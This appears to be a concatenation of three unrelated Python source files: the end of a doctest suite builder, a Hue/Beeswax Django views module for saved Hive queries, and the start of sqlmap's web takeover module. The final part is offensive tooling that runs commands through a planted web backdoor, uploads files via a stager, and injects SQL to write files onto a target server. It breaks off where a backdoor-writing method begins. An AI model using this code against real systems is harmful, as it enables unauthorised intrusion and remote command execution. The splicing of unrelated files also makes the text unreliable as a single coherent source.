optionflags=doctest.NORMALIZE_WHITESPACE |
doctest.ELLIPSIS)
s.layer = empty_layer
docs_suite.addTest(s)
for fn in ('sql/dml.txt',):
s = doctest.DocFileSuite('../../' + fn, parser=crash_parser,
setUp=setUpLocationsQuotesAndUserVisits,
tearDown=tearDownLocationsQuotesAndUserVisits,
optionflags=doctest.NORMALIZE_WHITESPACE |
doctest.ELLIPSIS)
s.layer = empty_layer
docs_suite.addTest(s)
for fn in ('best_practice/migrating_from_mongodb.txt',):
path = os.path.join('..', '..', fn)
s = doctest.DocFileSuite(path, parser=crash_parser,
setUp=setUp,
optionflags=doctest.NORMALIZE_WHITESPACE |
doctest.ELLIPSIS)
s.layer = empty_layer
docs_suite.addTest(s)
for fn in ('data_import.txt', 'cluster_upgrade.txt'):
path = os.path.join('..', '..', 'best_practice', fn)
s = doctest.DocFileSuite(path, parser=crash_parser,
setUp=setUpTutorials,
optionflags=doctest.NORMALIZE_WHITESPACE |
doctest.ELLIPSIS)
s.layer = empty_layer
docs_suite.addTest(s)
suite.addTests(docs_suite)
return suite
| |
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import math
import re
import sys
import time
from django import forms
from django.contrib import messages
from django.contrib.auth.models import User
from django.db.models import Q
from django.http import HttpResponse, QueryDict
from django.shortcuts import redirect
from django.utils.html import escape
from django.utils.translation import ugettext as _
from django.core.urlresolvers import reverse
from desktop.appmanager import get_apps_dict
from desktop.context_processors import get_app_name
from desktop.lib.paginator import Paginator
from desktop.lib.django_util import JsonResponse
from desktop.lib.django_util import copy_query_dict, format_preserving_redirect, render
from desktop.lib.django_util import login_notrequired, get_desktop_uri_prefix
from desktop.lib.exceptions_renderable import PopupException
from desktop.lib.i18n import smart_unicode
from desktop.models import Document
from jobsub.parameterization import find_variables
import beeswax.forms
import beeswax.design
import beeswax.management.commands.beeswax_install_examples
from beeswax import common, data_export, models
from beeswax.models import SavedQuery, QueryHistory
from beeswax.server import dbms
from beeswax.server.dbms import expand_exception, get_query_server_config, QueryServerException
LOG = logging.getLogger(__name__)
def index(request):
return execute_query(request)
"""
Design views
"""
def save_design(request, form, type_, design, explicit_save):
"""
save_design(request, form, type_, design, explicit_save) -> SavedQuery
A helper method to save the design:
* If ``explicit_save``, then we save the data in the current design.
* If the user clicked the submit button, we do NOT overwrite the current
design. Instead, we create a new "auto" design (iff the user modified
the data). This new design is named after the current design, with the
AUTO_DESIGN_SUFFIX to signify that it's different.
Need to return a SavedQuery because we may end up with a different one.
Assumes that form.saveform is the SaveForm, and that it is valid.
"""
authorized_get_design(request, design.id)
assert form.saveform.is_valid()
sub_design_form = form # Beeswax/Impala case
if type_ == models.HQL:
design_cls = beeswax.design.HQLdesign
elif type_ == models.IMPALA:
design_cls = beeswax.design.HQLdesign
elif type_ == models.SPARK:
from spark.design import SparkDesign
design_cls = SparkDesign
sub_design_form = form.query
else:
raise ValueError(_('Invalid design type %(type)s') % {'type': type_})
design_obj = design_cls(sub_design_form, query_type=type_)
name = form.saveform.cleaned_data['name']
desc = form.saveform.cleaned_data['desc']
return _save_design(request.user, design, type_, design_obj, explicit_save, name, desc)
def _save_design(user, design, type_, design_obj, explicit_save, name=None, desc=None):
# Design here means SavedQuery
old_design = design
new_data = design_obj.dumps()
# Auto save if (1) the user didn't click "save", and (2) the data is different.
# Create an history design if the user is executing a shared design.
# Don't generate an auto-saved design if the user didn't change anything.
if explicit_save and (not design.doc.exists() or design.doc.get().can_write_or_exception(user)):
design.name = name
design.desc = desc
design.is_auto = False
elif design_obj != old_design.get_design():
# Auto save iff the data is different
if old_design.id is not None:
# Clone iff the parent design isn't a new unsaved model
design = old_design.clone(new_owner=user)
if not old_design.is_auto:
design.name = old_design.name + models.SavedQuery.AUTO_DESIGN_SUFFIX
else:
design.name = models.SavedQuery.DEFAULT_NEW_DESIGN_NAME
design.is_auto = True
design.name = design.name[:64]
design.type = type_
design.data = new_data
design.save()
LOG.info('Saved %s design "%s" (id %s) for %s' % (explicit_save and '' or 'auto ', design.name, design.id, design.owner))
if design.doc.exists():
design.doc.update(name=design.name, description=design.desc)
else:
Document.objects.link(design, owner=design.owner, extra=design.type, name=design.name, description=design.desc)
if design.is_auto:
design.doc.get().add_to_history()
return design
def delete_design(request):
if request.method == 'POST':
ids = request.POST.getlist('designs_selection')
designs = dict([(design_id, authorized_get_design(request, design_id, owner_only=True)) for design_id in ids])
if None in designs.values():
LOG.error('Cannot delete non-existent design(s) %s' % ','.join([key for key, name in designs.items() if name is None]))
return list_designs(request)
for design in designs.values():
if request.POST.get('skipTrash', 'false') == 'false':
design.doc.get().send_to_trash()
else:
design.doc.all().delete()
design.delete()
return redirect(reverse(get_app_name(request) + ':list_designs'))
else:
return render('confirm.mako', request, {'url': request.path, 'title': _('Delete design(s)?')})
def restore_design(request):
if request.method == 'POST':
ids = request.POST.getlist('designs_selection')
designs = dict([(design_id, authorized_get_design(request, design_id)) for design_id in ids])
if None in designs.values():
LOG.error('Cannot restore non-existent design(s) %s' % ','.join([key for key, name in designs.items() if name is None]))
return list_designs(request)
for design in designs.values():
design.doc.get().restore_from_trash()
return redirect(reverse(get_app_name(request) + ':list_designs'))
else:
return render('confirm.mako', request, {'url': request.path, 'title': _('Restore design(s)?')})
def clone_design(request, design_id):
"""Clone a design belonging to any user"""
design = authorized_get_design(request, design_id)
if design is None:
LOG.error('Cannot clone non-existent design %s' % (design_id,))
return list_designs(request)
copy = design.clone(request.user)
copy.save()
copy_doc = design.doc.get().copy(owner=request.user)
copy.doc.all().delete()
copy.doc.add(copy_doc)
messages.info(request, _('Copied design: %(name)s') % {'name': design.name})
return format_preserving_redirect(request, reverse(get_app_name(request) + ':execute_design', kwargs={'design_id': copy.id}))
def list_designs(request):
"""
View function for show all saved queries.
We get here from /beeswax/list_designs?filterargs, with the options being:
page=<n> - Controls pagination. Defaults to 1.
user=<name> - Show design items belonging to a user. Default to all users.
type=<type> - <type> is "hql", for saved query type. Default to show all.
sort=<key> - Sort by the attribute <key>, which is one of:
"date", "name", "desc", and "type" (design type)
Accepts the form "-date", which sort in descending order.
Default to "-date".
text=<frag> - Search for fragment "frag" in names and descriptions.
"""
DEFAULT_PAGE_SIZE = 20
app_name = get_app_name(request)
# Extract the saved query list.
prefix = 'q-'
querydict_query = _copy_prefix(prefix, request.GET)
# Manually limit up the user filter.
querydict_query[ prefix + 'type' ] = app_name
page, filter_params = _list_designs(request.user, querydict_query, DEFAULT_PAGE_SIZE, prefix)
return render('list_designs.mako', request, {
'page': page,
'filter_params': filter_params,
'user': request.user,
'designs_json': json.dumps([query.id for query in page.object_list])
})
def list_trashed_designs(request):
DEFAULT_PAGE_SIZE = 20
app_name= get_app_name(request)
user = request.user
# Extract the saved query list.
prefix = 'q-'
querydict_query = _copy_prefix(prefix, request.GET)
# Manually limit up the user filter.
querydict_query[ prefix + 'type' ] = app_name
page, filter_params = _list_designs(user, querydict_query, DEFAULT_PAGE_SIZE, prefix, is_trashed=True)
return render('list_trashed_designs.mako', request, {
'page': page,
'filter_params': filter_params,
'user': request.user,
'designs_json': json.dumps([query.id for query in page.object_list])
})
def my_queries(request):
"""
View a mix of history and saved queries.
It understands all the GET params in ``list_query_history`` (with a ``h-`` prefix)
and those in ``list_designs`` (with a ``q-`` prefix). The only thing it disallows
is the ``user`` filter, since this view only shows what belongs to the user.
"""
DEFAULT_PAGE_SIZE = 30
app_name= get_app_name(request)
# Extract the history list.
prefix = 'h-'
querydict_history = _copy_prefix(prefix, request.GET)
# Manually limit up the user filter.
querydict_history[ prefix + 'user' ] = request.user
querydict_history[ prefix + 'type' ] = app_name
hist_page, hist_filter = _list_query_history(request.user,
querydict_history,
DEFAULT_PAGE_SIZE,
prefix)
# Extract the saved query list.
prefix = 'q-'
querydict_query = _copy_prefix(prefix, request.GET)
# Manually limit up the user filter.
querydict_query[ prefix + 'user' ] = request.user
querydict_query[ prefix + 'type' ] = app_name
query_page, query_filter = _list_designs(request.user, querydict_query, DEFAULT_PAGE_SIZE, prefix)
filter_params = hist_filter
filter_params.update(query_filter)
return render('my_queries.mako', request, {
'request': request,
'h_page': hist_page,
'q_page': query_page,
'filter_params': filter_params,
'designs_json': json.dumps([query.id for query in query_page.object_list])
})
def list_query_history(request):
"""
View the history of query (for the current user).
We get here from /beeswax/query_history?filterargs, with the options being:
page=<n> - Controls pagination. Defaults to 1.
user=<name> - Show history items from a user. Default to current user only.
Also accepts ':all' to show all history items.
type=<type> - <type> is "beeswax|impala", for design type. Default to show all.
design_id=<id> - Show history for this particular design id.
sort=<key> - Sort by the attribute <key>, which is one of:
"date", "state", "name" (design name), and "type" (design type)
Accepts the form "-date", which sort in descending order.
Default to "-date".
auto_query=<bool> - Show auto generated actions (drop table, read data, etc). Default True
"""
DEFAULT_PAGE_SIZE = 100
prefix = 'q-'
share_queries = request.user.is_superuser
querydict_query = request.GET.copy()
if not share_queries:
querydict_query[prefix + 'user'] = request.user.username
app_name = get_app_name(request)
querydict_query[prefix + 'type'] = app_name
page, filter_params = _list_query_history(request.user, querydict_query, DEFAULT_PAGE_SIZE, prefix)
filter = request.GET.get(prefix + 'search') and request.GET.get(prefix + 'search') or ''
if request.GET.get('format') == 'json':
resp = {
'queries': [massage_query_history_for_json(app_name, query_history) for query_history in page.object_list]
}
return JsonResponse(resp)
return render('list_history.mako', request, {
'request': request,
'page': page,
'filter_params': filter_params,
'share_queries': share_queries,
'prefix': prefix,
'filter': filter,
})
def massage_query_history_for_json(app_name, query_history):
return {
'query': escape(query_history.query),
'timeInMs': time.mktime(query_history.submission_date.timetuple()),
'timeFormatted': query_history.submission_date.strftime("%x %X"),
'designUrl': reverse(app_name + ':execute_design', kwargs={'design_id': query_history.design.id}),
'resultsUrl': not query_history.is_failure() and reverse(app_name + ':watch_query_history', kwargs={'query_history_id': query_history.id}) or ""
}
def download(request, id, format):
try:
query_history = authorized_get_query_history(request, id, must_exist=True)
db = dbms.get(request.user, query_history.get_query_server_config())
LOG.debug('Download results for query %s: [ %s ]' % (query_history.server_id, query_history.query))
return data_export.download(query_history.get_handle(), format, db)
except Exception, e:
if not hasattr(e, 'message') or not e.message:
message = e
else:
message = e.message
raise PopupException(message, detail='')
"""
Queries Views
"""
def execute_query(request, design_id=None, query_history_id=None):
"""
View function for executing an arbitrary query.
"""
action = 'query'
if query_history_id:
query_history = authorized_get_query_history(request, query_history_id, must_exist=True)
design = query_history.design
try:
if query_history.server_id and query_history.server_guid:
handle, state = _get_query_handle_and_state(query_history)
if 'on_success_url' in request.GET:
if request.GET.get('on_success_url'):
action = 'watch-redirect'
else:
action = 'watch-results'
else:
action = 'editor-results'
except QueryServerException, e:
if 'Invalid query handle' in e.message or 'Invalid OperationHandle' in e.message:
query_history.save_state(QueryHistory.STATE.expired)
LOG.warn("Invalid query handle", exc_info=sys.exc_info())
action = 'editor-expired-results'
else:
raise e
else:
# Check perms.
authorized_get_design(request, design_id)
app_name = get_app_name(request)
query_type = SavedQuery.TYPES_MAPPING[app_name]
design = safe_get_design(request, query_type, design_id)
query_history = None
doc = design and design.id and design.doc.get()
context = {
'design': design,
'query': query_history, # Backward
'query_history': query_history,
'autocomplete_base_url': reverse(get_app_name(request) + ':api_autocomplete_databases', kwargs={}),
'autocomplete_base_url_hive': reverse('beeswax:api_autocomplete_databases', kwargs={}),
'can_edit_name': design and design.id and not design.is_auto,
'doc_id': doc and doc.id or -1,
'can_edit': doc and doc.can_write(request.user),
'action': action,
'on_success_url': request.GET.get('on_success_url'),
'has_metastore': 'metastore' in get_apps_dict(request.user)
}
return render('execute.mako', request, context)
def view_results(request, id, first_row=0):
"""
Returns the view for the results of the QueryHistory with the given id.
The query results MUST be ready.
To display query results, one should always go through the execute_query view.
If the result set has has_result_set=False, display an empty result.
If ``first_row`` is 0, restarts (if necessary) the query read. Otherwise, just
spits out a warning if first_row doesn't match the servers conception.
Multiple readers will produce a confusing interaction here, and that's known.
It understands the ``context`` GET parameter. (See execute_query().)
"""
first_row = long(first_row)
start_over = (first_row == 0)
results = type('Result', (object,), {
'rows': 0,
'columns': [],
'has_more': False,
'start_row': 0,
})
data = []
fetch_error = False
error_message = ''
log = ''
columns = []
app_name = get_app_name(request)
query_history = authorized_get_query_history(request, id, must_exist=True)
query_server = query_history.get_query_server_config()
db = dbms.get(request.user, query_server)
handle, state = _get_query_handle_and_state(query_history)
context_param = request.GET.get('context', '')
query_context = parse_query_context(context_param)
# Update the status as expired should not be accessible
expired = state == models.QueryHistory.STATE.expired
# Retrieve query results or use empty result if no result set
try:
if query_server['server_name'] == 'impala' and not handle.has_result_set:
downloadable = False
else:
results = db.fetch(handle, start_over, 100)
data = []
# Materialize and HTML escape results
# TODO: use Number + list comprehension
for row in results.rows():
escaped_row = []
for field in row:
if isinstance(field, (int, long, float, complex, bool)):
if math.isnan(field) or math.isinf(field):
escaped_field = json.dumps(field)
else:
escaped_field = field
elif field is None:
escaped_field = 'NULL'
else:
field = smart_unicode(field, errors='replace') # Prevent error when getting back non utf8 like charset=iso-8859-1
escaped_field = escape(field).replace(' ', ' ')
escaped_row.append(escaped_field)
data.append(escaped_row)
# We display the "Download" button only when we know that there are results:
downloadable = first_row > 0 or data
log = db.get_log(handle)
columns = results.data_table.cols()
except Exception, ex:
fetch_error = True
error_message, log = expand_exception(ex, db, handle)
# Handle errors
error = fetch_error or results is None or expired
context = {
'error': error,
'message': error_message,
'query': query_history,
'results': data,
'columns': columns,
'expected_first_row': first_row,
'log': log,
'hadoop_jobs': app_name != 'impala' and _parse_out_hadoop_jobs(log),
'query_context': query_context,
'can_save': False,
'context_param': context_param,
'expired': expired,
'app_name': app_name,
'next_json_set': None,
'is_finished': query_history.is_finished()
}
if not error:
download_urls = {}
if downloadable:
for format in common.DL_FORMATS:
download_urls[format] = reverse(app_name + ':download', kwargs=dict(id=str(id), format=format))
results.start_row = first_row
context.update({
'id': id,
'results': data,
'has_more': results.has_more,
'next_row': results.start_row + len(data),
'start_row': results.start_row,
'expected_first_row': first_row,
'columns': columns,
'download_urls': download_urls,
'can_save': query_history.owner == request.user,
'next_json_set':
reverse(get_app_name(request) + ':view_results', kwargs={
'id': str(id),
'first_row': results.start_row + len(data)
}
)
+ ('?context=' + context_param or '') + '&format=json'
})
context['columns'] = massage_columns_for_json(columns)
if 'save_form' in context:
del context['save_form']
if 'query' in context:
del context['query']
return JsonResponse(context)
def configuration(request):
app_name = get_app_name(request)
query_server = get_query_server_config(app_name)
config_values = dbms.get(request.user, query_server).get_default_configuration(
bool(request.REQUEST.get("include_hadoop", False)))
for value in config_values:
if 'password' in value.key.lower():
value.value = "*" * 10
return render("configuration.mako", request, {'config_values': config_values})
"""
Other views
"""
def install_examples(request):
response = {'status': -1, 'message': ''}
if request.method == 'POST':
try:
app_name = get_app_name(request)
beeswax.management.commands.beeswax_install_examples.Command().handle(app_name=app_name, user=request.user)
response['status'] = 0
except Exception, err:
LOG.exception(err)
response['message'] = str(err)
else:
response['message'] = _('A POST request is required.')
return JsonResponse(response)
@login_notrequired
def query_done_cb(request, server_id):
"""
A callback for query completion notification. When the query is done,
BeeswaxServer notifies us by sending a GET request to this view.
"""
message_template = '<html><head></head>%(message)s<body></body></html>'
message = {'message': 'error'}
try:
query_history = QueryHistory.objects.get(server_id=server_id + '\n')
# Update the query status
query_history.set_to_available()
# Find out details about the query
if not query_history.notify:
message['message'] = 'email_notify is false'
return HttpResponse(message_template % message)
design = query_history.design
user = query_history.owner
subject = _("Beeswax query completed.")
if design:
subject += ": %s" % (design.name,)
link = "%s%s" % \
(get_desktop_uri_prefix(),
reverse(get_app_name(request) + ':watch_query_history', kwargs={'query_history_id': query_history.id}))
body = _("%(subject)s. See the results here: %(link)s\n\nQuery:\n%(query)s") % {
'subject': subject, 'link': link, 'query': query_history.query
}
user.email_user(subject, body)
message['message'] = 'sent'
except Exception, ex:
msg = "Failed to send query completion notification via e-mail: %s" % (ex)
LOG.error(msg)
message['message'] = msg
return HttpResponse(message_template % message)
"""
Utils
"""
def massage_columns_for_json(cols):
massaged_cols = []
for column in cols:
massaged_cols.append({
'name': column.name,
'type': column.type,
'comment': column.comment
})
return massaged_cols
def authorized_get_design(request, design_id, owner_only=False, must_exist=False):
if design_id is None and not must_exist:
return None
try:
design = SavedQuery.objects.get(id=design_id)
except SavedQuery.DoesNotExist:
if must_exist:
raise PopupException(_('Design %(id)s does not exist.') % {'id': design_id})
else:
return None
if owner_only:
design.doc.get().can_write_or_exception(request.user)
else:
design.doc.get().can_read_or_exception(request.user)
return design
def authorized_get_query_history(request, query_history_id, owner_only=False, must_exist=False):
if query_history_id is None and not must_exist:
return None
try:
query_history = QueryHistory.get(id=query_history_id)
except QueryHistory.DoesNotExist:
if must_exist:
raise PopupException(_('QueryHistory %(id)s does not exist.') % {'id': query_history_id})
else:
return None
# Some queries don't have a design so are not linked to Document Model permission
if query_history.design is None or not query_history.design.doc.exists():
if not request.user.is_superuser and request.user != query_history.owner:
raise PopupException(_('Permission denied to read QueryHistory %(id)s') % {'id': query_history_id})
else:
query_history.design.doc.get().can_read_or_exception(request.user)
return query_history
def safe_get_design(request, design_type, design_id=None):
"""
Return a new design, if design_id is None,
Return the design with the given id and type. If the design is not found,
display a notification and return a new design.
"""
design = None
if design_id is not None:
design = authorized_get_design(request, design_id)
if design is None:
design = SavedQuery(owner=request.user, type=design_type)
return design
def make_parameterization_form(query_str):
"""
Creates a django form on the fly with arguments from the
query.
"""
variables = find_variables(query_str)
if len(variables) > 0:
class Form(forms.Form):
for name in sorted(variables):
locals()[name] = forms.CharField(required=True)
return Form
else:
return None
def execute_directly(request, query, query_server=None,
design=None, on_success_url=None, on_success_params=None,
**kwargs):
"""
execute_directly(request, query_msg, tablename, design) -> HTTP response for execution
This method wraps around dbms.execute_query() to take care of the HTTP response
after the execution.
query
The HQL model Query object.
query_server
To which Query Server to submit the query.
Dictionary with keys: ['server_name', 'server_host', 'server_port'].
design
The design associated with the query.
on_success_url
Where to go after the query is done. The URL handler may expect an option "context" GET
param. (See ``watch_query``.) For advanced usage, on_success_url can be a function, in
which case the on complete URL is the return of:
on_success_url(history_obj) -> URL string
Defaults to the view results page.
on_success_params
Optional params to pass to the on_success_url (in additional to "context").
Note that this may throw a Beeswax exception.
"""
if design is not None:
authorized_get_design(request, design.id)
db = dbms.get(request.user, query_server)
database = query.query.get('database', 'default')
db.use(database)
query_history = db.execute_query(query, design)
watch_url = reverse(get_app_name(request) + ':watch_query_history', kwargs={'query_history_id': query_history.id})
# Prepare the GET params for the watch_url
get_dict = QueryDict(None, mutable=True)
# (1) on_success_url
if on_success_url:
if callable(on_success_url):
on_success_url = on_success_url(query_history)
get_dict['on_success_url'] = on_success_url
# (2) misc
if on_success_params:
get_dict.update(on_success_params)
return format_preserving_redirect(request, watch_url, get_dict)
def _list_designs(user, querydict, page_size, prefix="", is_trashed=False):
"""
_list_designs(user, querydict, page_size, prefix, is_trashed) -> (page, filter_param)
A helper to gather the designs page. It understands all the GET params in
``list_designs``, by reading keys from the ``querydict`` with the given ``prefix``.
"""
DEFAULT_SORT = ('-', 'date') # Descending date
SORT_ATTR_TRANSLATION = dict(
date='last_modified',
name='name',
desc='description',
type='extra',
)
# Trash and security
if is_trashed:
db_queryset = Document.objects.trashed_docs(SavedQuery, user)
else:
db_queryset = Document.objects.available_docs(SavedQuery, user)
# Filter by user
filter_username = querydict.get(prefix + 'user')
if filter_username:
try:
db_queryset = db_queryset.filter(owner=User.objects.get(username=filter_username))
except User.DoesNotExist:
# Don't care if a bad filter term is provided
pass
# Design type
d_type = querydict.get(prefix + 'type')
if d_type and d_type in SavedQuery.TYPES_MAPPING.keys():
db_queryset = db_queryset.filter(extra=str(SavedQuery.TYPES_MAPPING[d_type]))
# Text search
frag = querydict.get(prefix + 'text')
if frag:
db_queryset = db_queryset.filter(Q(name__icontains=frag) | Q(description__icontains=frag))
# Ordering
sort_key = querydict.get(prefix + 'sort')
if sort_key:
if sort_key[0] == '-':
sort_dir, sort_attr = '-', sort_key[1:]
else:
sort_dir, sort_attr = '', sort_key
if not SORT_ATTR_TRANSLATION.has_key(sort_attr):
LOG.warn('Bad parameter to list_designs: sort=%s' % (sort_key,))
sort_dir, sort_attr = DEFAULT_SORT
else:
sort_dir, sort_attr = DEFAULT_SORT
db_queryset = db_queryset.order_by(sort_dir + SORT_ATTR_TRANSLATION[sort_attr])
designs = [job.content_object for job in db_queryset.all() if job.content_object and job.content_object.is_auto == False]
pagenum = int(querydict.get(prefix + 'page', 1))
paginator = Paginator(designs, page_size)
page = paginator.page(pagenum)
# We need to pass the parameters back to the template to generate links
keys_to_copy = [ prefix + key for key in ('user', 'type', 'sort') ]
filter_params = copy_query_dict(querydict, keys_to_copy)
return page, filter_params
def _get_query_handle_and_state(query_history):
"""
Front-end wrapper to handle exceptions. Expects the query to be submitted.
"""
handle = query_history.get_handle()
if handle is None:
raise PopupException(_("Failed to retrieve query state from the Query Server."))
state = dbms.get(query_history.owner, query_history.get_query_server_config()).get_state(handle)
if state is None:
raise PopupException(_("Failed to contact Server to check query status."))
return (handle, state)
def parse_query_context(context):
"""
parse_query_context(context) -> ('table', <table_name>) -or- ('design', <design_obj>)
"""
if not context:
return None
pair = context.split(':', 1)
if len(pair) != 2 or pair[0] not in ('table', 'design'):
LOG.error("Invalid query context data: %s" % (context,))
return None
if pair[0] == 'design': # Translate design id to design obj
pair[1] = models.SavedQuery.get(int(pair[1]))
return pair
HADOOP_JOBS_RE = re.compile("Starting Job = ([a-z0-9_]+?),")
def _parse_out_hadoop_jobs(log):
"""
Ideally, Hive would tell us what jobs it has run directly from the Thrift interface.
"""
ret = []
for match in HADOOP_JOBS_RE.finditer(log):
job_id = match.group(1)
if job_id not in ret:
ret.append(job_id)
return ret
def _copy_prefix(prefix, base_dict):
"""Copy keys starting with ``prefix``"""
querydict = QueryDict(None, mutable=True)
for key, val in base_dict.iteritems():
if key.startswith(prefix):
querydict[key] = val
return querydict
def _list_query_history(user, querydict, page_size, prefix=""):
"""
_list_query_history(user, querydict, page_size, prefix) -> (page, filter_param)
A helper to gather the history page. It understands all the GET params in
``list_query_history``, by reading keys from the ``querydict`` with the
given ``prefix``.
"""
DEFAULT_SORT = ('-', 'date') # Descending date
SORT_ATTR_TRANSLATION = dict(
date='submission_date',
state='last_state',
name='design__name',
type='design__type',
)
db_queryset = models.QueryHistory.objects.select_related()
# Filtering
#
# Queries without designs are the ones we submitted on behalf of the user,
# (e.g. view table data). Exclude those when returning query history.
if querydict.get(prefix + 'auto_query', 'on') != 'on':
db_queryset = db_queryset.exclude(design__isnull=False, design__is_auto=True)
user_filter = querydict.get(prefix + 'user', user.username)
if user_filter != ':all':
db_queryset = db_queryset.filter(owner__username=user_filter)
# Design id
design_id = querydict.get(prefix + 'design_id')
if design_id:
db_queryset = db_queryset.filter(design__id=int(design_id))
# Search
search_filter = querydict.get(prefix + 'search')
if search_filter:
db_queryset = db_queryset.filter(Q(design__name__icontains=search_filter) | Q(query__icontains=search_filter) | Q(owner__username__icontains=search_filter))
# Design type
d_type = querydict.get(prefix + 'type')
if d_type:
if d_type not in SavedQuery.TYPES_MAPPING.keys():
LOG.warn('Bad parameter to list_query_history: type=%s' % (d_type,))
else:
db_queryset = db_queryset.filter(design__type=SavedQuery.TYPES_MAPPING[d_type])
# Ordering
sort_key = querydict.get(prefix + 'sort')
if sort_key:
sort_dir, sort_attr = '', sort_key
if sort_key[0] == '-':
sort_dir, sort_attr = '-', sort_key[1:]
if not SORT_ATTR_TRANSLATION.has_key(sort_attr):
LOG.warn('Bad parameter to list_query_history: sort=%s' % (sort_key,))
sort_dir, sort_attr = DEFAULT_SORT
else:
sort_dir, sort_attr = DEFAULT_SORT
db_queryset = db_queryset.order_by(sort_dir + SORT_ATTR_TRANSLATION[sort_attr], '-id')
# Get the total return count before slicing
total_count = db_queryset.count()
# Slicing (must be the last filter applied)
pagenum = int(querydict.get(prefix + 'page', 1))
if pagenum < 1:
pagenum = 1
db_queryset = db_queryset[ page_size * (pagenum - 1) : page_size * pagenum ]
paginator = Paginator(db_queryset, page_size, total=total_count)
page = paginator.page(pagenum)
# We do slicing ourselves, rather than letting the Paginator handle it, in order to
# update the last_state on the running queries
for history in page.object_list:
_update_query_state(history.get_full_object())
# We need to pass the parameters back to the template to generate links
keys_to_copy = [ prefix + key for key in ('user', 'type', 'sort', 'design_id', 'auto_query', 'search') ]
filter_params = copy_query_dict(querydict, keys_to_copy)
return page, filter_params
def _update_query_state(query_history):
"""
Update the last_state for a QueryHistory object. Returns success as True/False.
This only occurs iff the current last_state is submitted or running, since the other
states are stable, more-or-less.
Note that there is a transition from available/failed to expired. That occurs lazily
when the user attempts to view results that have expired.
"""
if query_history.last_state <= models.QueryHistory.STATE.running.index:
try:
state_enum = dbms.get(query_history.owner, query_history.get_query_server_config()).get_state(query_history.get_handle())
if state_enum is None:
# Error was logged at the source
return False
except Exception, e:
LOG.error(e)
state_enum = models.QueryHistory.STATE.failed
query_history.save_state(state_enum)
return True
def get_db_choices(request):
app_name = get_app_name(request)
query_server = get_query_server_config(app_name)
db = dbms.get(request.user, query_server)
dbs = db.get_databases()
return [(db, db) for db in dbs]
WHITESPACE = re.compile("\s+", re.MULTILINE)
def collapse_whitespace(s):
return WHITESPACE.sub(" ", s).strip()
| |
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import posixpath
import re
import StringIO
import tempfile
import urlparse
from extra.cloak.cloak import decloak
from lib.core.agent import agent
from lib.core.common import arrayizeValue
from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getAutoDirectories
from lib.core.common import getManualDirectories
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSQLSnippet
from lib.core.common import getUnicode
from lib.core.common import ntToPosixSlashes
from lib.core.common import isTechniqueAvailable
from lib.core.common import isWindowsDriveLetterPath
from lib.core.common import normalizePath
from lib.core.common import posixToNtSlashes
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import singleTimeWarnMessage
from lib.core.convert import hexencode
from lib.core.convert import utf8encode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.enums import PAYLOAD
from lib.core.enums import WEB_API
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
from lib.core.settings import EVENTVALIDATION_REGEX
from lib.core.settings import VIEWSTATE_REGEX
from lib.request.connect import Connect as Request
from thirdparty.oset.pyoset import oset
class Web:
"""
This class defines web-oriented OS takeover functionalities for
plugins.
"""
def __init__(self):
self.webApi = None
self.webBaseUrl = None
self.webBackdoorUrl = None
self.webBackdoorFilePath = None
self.webStagerUrl = None
self.webStagerFilePath = None
self.webDirectory = None
def webBackdoorRunCmd(self, cmd):
if self.webBackdoorUrl is None:
return
output = None
if not cmd:
cmd = conf.osCmd
cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd)
page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT)
if page is not None:
output = re.search("<pre>(.+?)</pre>", page, re.I | re.S)
if output:
output = output.group(1)
return output
def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None):
if filepath is not None:
if filepath.endswith('_'):
content = decloak(filepath) # cloaked file
else:
with open(filepath, "rb") as f:
content = f.read()
if content is not None:
stream = StringIO.StringIO(content) # string content
return self._webFileStreamUpload(stream, destFileName, directory)
def _webFileStreamUpload(self, stream, destFileName, directory):
stream.seek(0) # Rewind
try:
setattr(stream, "name", destFileName)
except TypeError:
pass
if self.webApi in getPublicTypeMembers(WEB_API, True):
multipartParams = {
"upload": "1",
"file": stream,
"uploadDir": directory,
}
if self.webApi == WEB_API.ASPX:
multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE
page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
if "File uploaded" not in page:
warnMsg = "unable to upload the file through the web file "
warnMsg += "stager to '%s'" % directory
logger.warn(warnMsg)
return False
else:
return True
else:
logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webApi)
return False
def _webFileInject(self, fileContent, fileName, directory):
outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
query = ""
if isTechniqueAvailable(kb.technique):
where = kb.injection.data[kb.technique].where
if where == PAYLOAD.WHERE.NEGATIVE:
randInt = randomInt()
query += "OR %d=%d " % (randInt, randInt)
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
query = agent.prefixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
page = Request.queryPage(payload)
return page
def webInit(self):
"""
This method is used to write a web backdoor (agent) on a writable
remote directory within the web server document root.
"""
